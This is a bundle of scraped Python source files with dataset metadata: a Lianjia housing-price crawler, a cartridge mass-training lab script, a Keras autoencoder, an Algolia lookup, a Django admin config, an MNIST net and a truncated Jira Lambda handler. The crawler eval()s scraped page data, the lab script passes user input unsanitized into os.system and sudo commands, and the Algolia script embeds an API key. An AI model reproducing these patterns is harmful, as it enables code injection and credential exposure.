:field\n _url_dict: url for different area, key is area in Beijing(str),\n value is list of url in this area\n _html_dict: html for different area, key is area in Beijing(str),\n value is list of url in this area\n _price_dict: average price for different area, key is area in Beijing(str),\n value is list of url in this area\n\n '''\n if url[7:9] == 'sh' or url[7:9] == 'su': # special url for Shanghai and Suzhou\n self._url = url + '/list'\n else:\n self._url = url + '/loupan' # the price information is with this suffix\n self._url_dict = defaultdict(list)\n self._html_dict = defaultdict(list)\n 
self._price_dict = {}\n\n self._area_map = area_map\n\n self.logger = logging.getLogger(type(self).__name__)\n\n def _generate_url_dict(self):\n '''\n generate urls for different area, store them into the _url_dict,\n parse all\n :return:\n '''\n for area, url_name in self._area_map.items():\n try:\n url_root_area = self._url + '/' + url_name # root url for this area\n response = requests.get(url_root_area)\n except Exception as e:\n self.logger.exception(e)\n\n if response.status_code != 200:\n # log the info\n pass\n else:\n soup = BeautifulSoup(response.text, 'lxml')\n # get the number of pages for this area\n\n # print soup.find('div',class_='page-box house-lst-page-box')\n page_block = soup.find('div', class_='page-box house-lst-page-box')\n if page_block is None:\n continue\n else:\n dict_tmp = eval(page_block.get('page-data', ''))\n page_num = dict_tmp.get('totalPage', 0)\n\n # append the url\n for page_index in range(1, page_num + 1):\n self._url_dict[area].append(url_root_area + '/pg{}'.format(page_index))\n\n def _get_html_dict(self):\n '''\n parse the url in url_dict and store them in html_dict.\n :return:\n\n :notice:\n call _generate_url_dict() first before this function\n '''\n for area, url_list in self._url_dict.items():\n if len(url_list) == 0:\n raise ValueError('please generate url dict first')\n for url in url_list:\n try:\n response = requests.get(url)\n except Exception as e:\n # log\n # print traceback.print_exc()\n self.logger.exception(e)\n if response.status_code == 200:\n self._html_dict[area].append(response.text)\n else:\n # log\n pass\n\n def get_price_dict(self):\n '''\n generate the average prices for different areas\n :return:\n\n :notice:\n 1: call _generate_url_dict() and _get_html_dict() first\n 2: I only consider the average price here, thus the price calculated is based on\n average, eg, 20000 RMB/m^2\n '''\n # generate the url and html first\n self._generate_url_dict()\n self._get_html_dict()\n\n for area, html_list in self._html_dict.items():\n total_price = 0\n succ_count = 0\n\n # get the price in the html,\n for html in html_list:\n count_tmp, price_tmp = self._cal_average_price_from_html(html)\n succ_count += count_tmp\n total_price += price_tmp\n\n if succ_count == 0:\n # log\n pass\n else:\n average_price = round(total_price * 1.0 / succ_count, 0)\n self._price_dict[area] = average_price\n\n def _cal_average_price_from_html(self, html):\n '''\n parse the html and return the count and price for this html\n :param html:\n :return:\n succ_count: the succ count for the price for this html\n total_price: total price for the counts for this html\n '''\n soup = BeautifulSoup(html, 'lxml')\n\n div_list = soup.find_all('div', class_='col-2')\n succ_count = 0\n total_price = 0\n for index in range(len(div_list)):\n # print div_list[index].text.replace('\\n','')\n each_line = div_list[index].text.replace('\\n', '')\n each_line_no_space = re.sub('\\s*', '', each_line)\n # print each_line_no_space\n # print each_line_no_space[:3]\n\n # print each_line_no_space[:2]\n # print each_line_no_space[:2] == u'场均'\n if each_line_no_space[:2] == u'均价':\n try:\n # extract the price for every line and add them to the total price\n price = re.findall('\\d+', each_line_no_space)\n if len(price) is not 0:\n total_price += float(price[0])\n succ_count += 1\n except Exception as e:\n self.logger.exception(e)\n return succ_count, total_price\n\n\nif __name__ == '__main__':\n # lianjia_root_site = 'http://bj.fang.lianjia.com'\n # lianjia = 
LianJiaCrawler(lianjia_root_site)\n\n\n # debug code\n # print lianjia._url_dict\n # print lianjia._html_dict\n # print lianjia._html_dict[u'HuaiRou'][0]\n # lianjia._cal_average_price_from_html(lianjia._html_dict[u'HuaiRou'][0])\n # print lianjia._price_dict\n\n from datetime import date\n from utils.file_utils import ensure_dir\n ensure_dir(PROJECT_DIR + '/data/json/crawler/housing')\n json_out_path = PROJECT_DIR + '/data/json/crawler/housing/{0}_lianjia_housing.json'.format(str(date.today()))\n\n json_dict = {}\n for city, confg in LIANJIA_MAP.items():\n lianjia = LianJiaCrawler(confg['website'], confg['area_map'])\n lianjia.get_price_dict()\n # print lianjia._price_dict\n json_dict[city] = lianjia._price_dict\n\n\n # save the price to the json file\n with open(json_out_path, 'w') as f:\n json.dump(json_dict,f)\n\n\n\n\n", "sub_path": "web_crawler/china_housing_price/LianJia_Crawler.py", "file_name": "LianJia_Crawler.py", "file_ext": "py", "file_size_in_byte": 7511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.log_util.log_format", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 90, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 168, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 176, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 185, "usage_type": "call"}, {"api_name": "utils.file_utils.ensure_dir", "line_number": 208, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 209, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 209, "usage_type": "name"}, {"api_name": "lianjia_confg.LIANJIA_MAP.items", "line_number": 212, "usage_type": "call"}, {"api_name": "lianjia_confg.LIANJIA_MAP", "line_number": 212, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "634167142", "text": "import os\nimport keyboard\nfrom datetime import datetime\n\n\nprint(\"========================================================= \\n\",\n \"Red Meters Cartridge Trainer ~ Mass 4.0\\n\",\n \"This application WILL SHUT DOWN the device back end while running. Please allow it to completely finish.\\n \",\n \"If you do not get the 'All done!' message at the end, the back end most likely WAS NOT RESTARTED. \\n\",\n \" In this case, reboot the Red Meter to get the back end working again or DATA WILL NOT BE STORED.\\n\",\n \"========================================================= \\n\"\n )\n\ncartName = input(\"ENTER: Cartridge name: \")\n\n\n\n# REWRITE :\n#\ndir = \"/var/lib/rosenimbus/csv/\" + cartName\nif os.path.isfile(dir):\n print(\"A cartridge with this name/serial has already been tested. 
 Re-using cartridge specifications.\")\n\n# else: ????\n# ./cartridge.sh $cname\nelse:\n    exec(open('cartridge.py').read())\n\n\ntimestamp = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\ntestDir = dir + \"/mass_\" + timestamp\ndiameter = float(os.popen(\"jq .inner_diameter_in \" + dir + \"/cartridge.json\").read())\nballsRolled = 0\nballs = [67, 1046, 130, 8164, 3, 1807, 28, 226, 4273, 8, 93, 536]\nnumOfBalls = len(balls)\n\n\n#REFACTOR\nprint(\"Making new test directory...\")\nos.system(\"sudo mkdir \" + testDir)\n\nos.system(\"systemctl stop rosenimbus-backend.service\")\n\n\n# How are we to evaluate mass?\n# NEED: Testing code cleaned up and insight, please advise\n\nfor mass in balls:\n    ballDiameter = 1  # placeholder until per-ball diameters are known\n    ballsRolled = ballsRolled + 1\n\n    if ballDiameter >= diameter:\n        print(\"==============================================\\n\",\n              str(ballsRolled) + \" / \" + str(numOfBalls) + \": Skipping the \" + str(mass) + \" gram ball as it will not fit in cartridge\")\n        touchFile = testDir + \"/\" + str(mass) + \"g-skipped\"\n        os.system(\"touch \" + touchFile)\n        continue\n    print(\"=========================================================\\n\")\n    print(str(ballsRolled) + \" / \" + str(numOfBalls) + \": Please use \" + str(mass) + \" gram ball next...\")\n    print(\"Roll the ball through the training cartridge three times in the same direction within 30 seconds\\n\")\n    print(\"Press 'Escape' to skip this ball or 'Enter' when you're ready to begin\")\n    while True:\n        try:\n            if keyboard.is_pressed('esc'):\n                print(\"Skipping \" + str(mass) + \" gram ball by user command\")\n                break\n\n            if keyboard.is_pressed('enter'):\n                testfile = testDir + \"/\" + str(mass) + \"-g.csv\"\n                os.system(\"python /root/DeviceBackend/example/totalreader/totalreader_csv.py -c \" + testfile + \" 0.01 30 \" + str(mass))\n                break\n        except:\n            break\n\nprint(\"Restarting Device Backend service...\")\nos.system(\"systemctl start rosenimbus-backend.service\")\n\n\n\n", "sub_path": "mass.py", "file_name": "mass.py", "file_ext": "py", "file_size_in_byte": 2828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "os.system", "line_number": 32, "usage_type": "call"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}, {"api_name": "os.system", "line_number": 42, "usage_type": "call"}, {"api_name": "os.system", "line_number": 57, "usage_type": "call"}, {"api_name": "keyboard.is_pressed", "line_number": 64, "usage_type": "call"}, {"api_name": "keyboard.is_pressed", "line_number": 68, "usage_type": "call"}, {"api_name": "os.system", "line_number": 70, "usage_type": "call"}, {"api_name": "os.system", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "65334916", "text": "import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport tensorflow.python.util.deprecation as deprecation\ndeprecation._PRINT_DEPRECATION_WARNINGS = False\n\n# ↑ Used to remove warning and info messages from tensorflow ↑\n\nimport pickle\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Dense, Dropout, Flatten, Reshape\nfrom tensorflow.keras.layers import Conv2D, Conv2DTranspose, MaxPooling2D, 
UpSampling2D\n\ndef LoadDataset(size, display_template):\n    if size == 0:\n        pickle_in = open(\"dataset_min.pickle\",\"rb\")\n\n    elif size == 1:\n        pickle_in = open(\"dataset_mid.pickle\",\"rb\")\n\n    elif size == 2:\n        pickle_in = open(\"dataset.pickle\",\"rb\")\n\n    dataset = np.asarray(pickle.load(pickle_in))\n\n    if display_template:\n        plt.imshow(dataset[0])\n        plt.show()\n\n    return dataset\n\n\ndef CreateEncoder(display_summary, optimizer, loss):\n    i = Input( shape=(64, 64, 3, ) )\n\n    x = Conv2D( 8, (3, 3), activation=\"relu\", padding=\"same\" )(i)\n    x = MaxPooling2D( (2, 2) )(x)\n    # Output size = (32, 32, 8)\n\n    x = Conv2D( 16, (3, 3), activation=\"relu\", padding=\"same\" )(x)\n    x = MaxPooling2D( (2, 2) )(x)\n    # Output size = (16, 16, 16)\n\n    x = Conv2D( 8, (3, 3), activation=\"relu\", padding=\"same\" )(x)\n    x = MaxPooling2D( (2, 2) )(x)\n    # Output size = (8, 8, 8)\n\n    x = Flatten()(x)\n    # Output size = (512)\n\n    x = Dense( 512, activation=\"relu\" )(x)\n    x = Dense( 64, activation=\"sigmoid\" )(x) # Latent space values range from 0 to 1\n\n    m = Model(i, x)\n    m.compile( optimizer=optimizer, loss=loss )\n\n    if ( display_summary ): print( m.summary() )\n\n    return m\n\ndef CreateDecoder(display_summary, optimizer, loss):\n    i = Input( shape=(64, ) )\n\n    x = Dense( 512, activation=\"relu\" )(i)\n\n    x = Reshape( target_shape=(8, 8, 8) )(x)\n\n    x = UpSampling2D( (2, 2) )(x)\n    x = Conv2DTranspose( 16, (3, 3), activation=\"relu\", padding=\"same\" )(x)\n    # Output shape = (16, 16, 16)\n\n    x = Flatten()(x)\n    # Output shape = (4096)\n\n    x = Dense( 4096, activation=\"relu\" )(x)\n    x = Dense( 8192, activation=\"relu\" )(x)\n\n    x = Reshape( target_shape=(32, 32, 8) )(x)\n    # Output shape = (32, 32, 8)\n\n    x = UpSampling2D( (2, 2) )(x)\n    x = Conv2DTranspose( 3, (3, 3), activation=\"sigmoid\", padding=\"same\" )(x)\n    # Output shape = (64, 64, 3)\n\n    m = Model(i, x)\n    m.compile( optimizer=optimizer, loss=loss )\n\n    if ( display_summary ): print( m.summary() )\n\n    return m\n\ndef CreateAutoencoder(encoder, decoder, display_summary, optimizer, loss):\n    i = Input( shape=(64, 64, 3, ) )\n\n    x = encoder(i)\n\n    x = decoder(x)\n\n    m = Model(i, x)\n    m.compile( optimizer=optimizer, loss=loss )\n\n    if ( display_summary ): print( m.summary() )\n\n    return m\n\ndef SampleDecodedQuality(epoch):\n    # Reconstruct a random sample of images from the dataset\n    sample = np.random.randint(0, dataset.shape[0], size=25)\n    images = autoencoder.predict(dataset[sample])\n\n    # Create a figure from the predicted images\n    w, h = 64, 64\n    cols, rows = 5, 5\n\n    fig=plt.figure(figsize=(8, 8))\n\n    for i in range(1, cols*rows +1):\n        fig.add_subplot(rows, cols, i)\n        plt.axis('off')\n        plt.imshow(images[i-1])\n\n    # Save the figure to the images dir\n    plt.savefig(f\"Images/Epoch #{epoch}\")\n    plt.close(fig)\n\ndef SaveModel(name, model):\n    model.save(name)\n\ndef LoadModels(encoder_path, decoder_path):\n    encoder = tf.keras.models.load_model(encoder_path)\n    decoder = tf.keras.models.load_model(decoder_path)\n\n    return encoder, decoder\n\ndef TrainAutoencoder(epochs, update_rate, batch_size, dataset):\n    history = np.array([])\n\n    for e in range(epochs):\n        epoch = (e * update_rate)\n        print(f\"Beginning Epoch #{epoch}\")\n\n        # Train the autoencoder for update_rate epochs\n        h = autoencoder.fit(dataset, dataset, epochs=update_rate, batch_size=batch_size, verbose=0)\n\n        history = np.append(history, 
h.history[\"loss\"])\n\n        SampleDecodedQuality(epoch)\n\n        # Make a save of both models on this generation for backup purposes\n        SaveModel(f\"Models/Backup/Encoder/encoder_{epoch}\", encoder)\n        SaveModel(f\"Models/Backup/Decoder/decoder_{epoch}\", decoder)\n\n    return history\n\n\n# Used to track how long the training process takes\nstart_time = time.time()\n\nEPOCHS = 20 # Number of outer training cycles (one image/model save per cycle)\nUPDATE_RATE = 10 # Training epochs per cycle\nBATCH_SIZE = 1024 # Batch size for training\nUSE_OLD_MODELS = False\n\n# Load a dataset (0 = min, 1 = mid, 2 = max)\nprint(\"Loading dataset\")\ndataset = LoadDataset(1, False)\n\nprint(f\"Finished loading dataset in {time.time() - start_time} seconds\")\n\nif USE_OLD_MODELS:\n    encoder, decoder = LoadModels(\"Models/Models-8/Encoder/encoder_90\", \"Models/Models-8/Decoder/decoder_90\")\nelse:\n    encoder = CreateEncoder(False, \"Adam\", \"mse\")\n    decoder = CreateDecoder(False, \"Adam\", \"mse\")\n\nautoencoder = CreateAutoencoder(encoder, decoder, True, \"Adam\", \"mse\")\n\nstart_time = time.time()\nhistory = TrainAutoencoder(EPOCHS, UPDATE_RATE, BATCH_SIZE, dataset)\nprint(f\"Finished training, completed {EPOCHS * UPDATE_RATE} epochs in {time.time() - start_time} seconds\")\n\nplt.plot(history)\nplt.savefig(\"Images/Loss_Graph\")", "sub_path": "Python/_Autoencoder/Celeba Autoencoder/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5637, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "tensorflow.python.util.deprecation._PRINT_DEPRECATION_WARNINGS", "line_number": 5, "usage_type": "attribute"}, {"api_name": "tensorflow.python.util.deprecation", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 29, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 69, "usage_type": "call"}, {"api_name": 
"tensorflow.keras.layers.Reshape", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.UpSampling2D", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Reshape", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.UpSampling2D", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 135, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 150, "usage_type": "call"}, {"api_name": "time.time", "line_number": 162, "usage_type": "call"}, {"api_name": "time.time", "line_number": 173, "usage_type": "call"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "time.time", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}]} +{"seq_id": "235613975", "text": "from algoliasearch import algoliasearch\n\nclient = algoliasearch.Client(\"HD0XCBXFH1\", 'a579548162960a8ecf866b64340c86e4')\nindex = client.init_index('signs')\n\n# res = index.add_objects([\n# {\"name\": \"Stop\", \"meaning\": \"You have to stop.\"},\n# {\"name\": \"Start\", \"meaning\": \"You have to start.\"}\n# ])\n\n# print res\ndictionary = {\n \"startId\":\"17375292\",\n 
\"stopId\":\"17375282\"\n}\nres = index.get_objects([dictionary[\"startId\"]])\n\nprint(res['results'][0]['meaning'])\n\nres = index.get_objects([dictionary[\"stopId\"]])\n\nprint(res['results'][0]['meaning'])", "sub_path": "ReadBraille_MadHacks/algolia_python.py", "file_name": "algolia_python.py", "file_ext": "py", "file_size_in_byte": 554, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "algoliasearch.algoliasearch.Client", "line_number": 3, "usage_type": "call"}, {"api_name": "algoliasearch.algoliasearch", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "30358188", "text": "\n# Django\nfrom django.contrib import admin\n\n# Models\nfrom .models import Marca, Rubro, UnidadMedida, Articulo, Comanda\n\n\nclass MarcaAdmin(admin.ModelAdmin):\n\n list_display = [\n 'descripcion',\n 'activo'\n ]\n\n list_filter = [\n 'descripcion',\n 'activo'\n ]\n\n search_fields = [\n 'id',\n 'descripcion',\n 'activo'\n ]\n\n\nclass ComandaAdmin(admin.ModelAdmin):\n\n list_display = [\n 'descripcion',\n 'activo'\n ]\n\n list_filter = [\n 'descripcion',\n 'activo'\n ]\n\n search_fields = [\n 'id',\n 'descripcion',\n 'activo'\n ]\n\nclass RubroAdmin(admin.ModelAdmin):\n\n list_display = [\n 'id',\n 'descripcion'\n ]\n\n list_filter = [\n 'descripcion'\n ]\n\n search_fields = [\n 'id',\n 'descripcion'\n ]\n\n\nclass UnidadMedidaAdmin(admin.ModelAdmin):\n\n list_display = [\n 'id',\n 'descripcion',\n 'abreviatura'\n ]\n\n list_filter = [\n 'id',\n 'descripcion',\n 'abreviatura'\n ]\n\n search_fields = [\n 'id',\n 'descripcion',\n 'abreviatura'\n ]\n\n\nclass ArticuloAdmin(admin.ModelAdmin):\n\n list_display = [\n 'codigo',\n 'descripcion',\n 'cantidad',\n 'cantidad_minima',\n 'rubro',\n 'marca',\n 'precio_compra',\n 'precio_venta',\n 'proveedor',\n 'receta'\n ]\n\n search_fields = [\n 'rubro__descripcion',\n 'marca__descripcion',\n 'codigo',\n 'descripcion',\n 'cantidad_minima',\n 'precio_compra',\n 'precio_venta'\n ]\n\n list_filter = [\n 'rubro__descripcion',\n 'marca__descripcion',\n 'codigo',\n 'descripcion',\n 'cantidad_minima',\n 'precio_compra',\n 'precio_venta'\n ]\n\nadmin.site.register(Marca, MarcaAdmin)\nadmin.site.register(Rubro, RubroAdmin)\nadmin.site.register(Comanda, ComandaAdmin)\nadmin.site.register(UnidadMedida, UnidadMedidaAdmin)\nadmin.site.register(Articulo, ArticuloAdmin)\n", "sub_path": "apps/articulos/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 46, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 46, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 63, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 63, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 84, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 119, 
"usage_type": "call"}, {"api_name": "models.Marca", "line_number": 119, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 119, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 119, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Rubro", "line_number": 120, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 120, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 120, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Comanda", "line_number": 121, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 121, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 122, "usage_type": "call"}, {"api_name": "models.UnidadMedida", "line_number": 122, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Articulo", "line_number": 123, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 123, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 123, "usage_type": "name"}]} +{"seq_id": "494218466", "text": "# Attempt 1\n# 97.6-98% accuracy on test data\n# Basic feedforward neural network for MNIST Digit Recognition\n\nimport keras\nfrom keras.datasets import mnist\nfrom keras.layers import Dense, Dropout\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\n# formatting training and test data\n(train_input, train_output), (test_input, test_output) = mnist.load_data()\n\ntrain_input = train_input.astype('float32')\ntrain_input /= 255\ntrain_input = train_input.reshape(train_input.shape[0], 784)\n\ntrain_output = keras.utils.to_categorical(train_output, 10)\n\ntest_input = test_input.astype('float32')\ntest_input /= 255\ntest_input = test_input.reshape(test_input.shape[0], 784)\n\ntest_output = keras.utils.to_categorical(test_output, 10)\n\n\n# neural network\nmodel = Sequential()\n\nmodel.add(Dense(150,\n activation='sigmoid',\n kernel_initializer='lecun_uniform'))\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(optimizer=Adam(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nprint(\"Training...\")\nmodel.fit(train_input,\n train_output,\n batch_size=10,\n epochs=27,\n verbose=2)\n\nprint(\"Testing...\")\nscore = model.evaluate(test_input, test_output)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])", "sub_path": "FeedforwardOne.py", "file_name": "FeedforwardOne.py", "file_ext": "py", "file_size_in_byte": 1346, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 12, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 12, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": 
"keras.utils.to_categorical", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 24, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "613396957", "text": "import json\nfrom vger_commons.database_connection.sql_alchemy_session import SqlAlchemySession\nfrom vger_commons.database_connection.sql_alchemy_session import rollback_and_close\nfrom vger_commons.database_connection.sql_alchemy_session import update_team_status_states\nfrom vger_commons.database_connection.sql_alchemy_session import update_team_work_states\nfrom vger_commons.database_connection.sql_alchemy_session import update_default_lead_time_states\nfrom utils.api_response_helper import ApiResponseError\nfrom utils.api_response_helper import response_formatter\nfrom utils.api_response_helper import api_response_handler\nfrom utils.jira_helper.JiraBoardConfiguration import JiraBoardConfiguration\n\n\ndef handler(event, context):\n return api_response_handler(__update_work_states, event)\n\n\ndef __update_work_states(event):\n board_configuration = __parse_lambda_input_for_jira_configuration(event)\n project_id = __parse_project_id_from_input(event)\n __apply_work_state_update(board_config=board_configuration, project_id=project_id)\n return response_formatter(status_code='200', body={})\n\n\ndef __parse_lambda_input_for_jira_configuration(lambda_input):\n try:\n # User input\n data = json.loads(lambda_input['body'])\n return JiraBoardConfiguration(work_states=data['workStates'],\n lead_time_start_state=data['defaultLeadTimeStartState'],\n lead_time_end_state=data['defaultLeadTimeEndState'])\n except Exception:\n payload = {'message': 'Invalid user input'}\n raise ApiResponseError(status_code=400, body=payload)\n\n\ndef __parse_project_id_from_input(lambda_input):\n try:\n return lambda_input.get('pathParameters').get('id')\n except Exception:\n payload = {\"message\": \"Could not get id path parameter\"}\n raise ApiResponseError(status_code=400, body=payload)\n\n\ndef __apply_work_state_update(board_config, project_id):\n sqlalchemy = SqlAlchemySession()\n session = sqlalchemy.Session()\n try:\n status_state_values = [] # Values to insert in team_status_states table\n work_state_values = [] # Values to insert in team_work_states table\n seq_number = 0 # Sequence counter for team_work_states table\n\n for work_state in board_config.work_states:\n for status in work_state['status']:\n status_state_values.append((int(project_id), str(status), str(work_state['name'])))\n\n work_state_values.append((int(project_id), str(work_state['name']), seq_number))\n seq_number += 1\n update_team_status_states(project_id=project_id,\n status_states_list=status_state_values,\n session=session)\n update_team_work_states(project_id=project_id,\n work_states_list=work_state_values,\n session=session)\n update_default_lead_time_states(project_id=project_id,\n 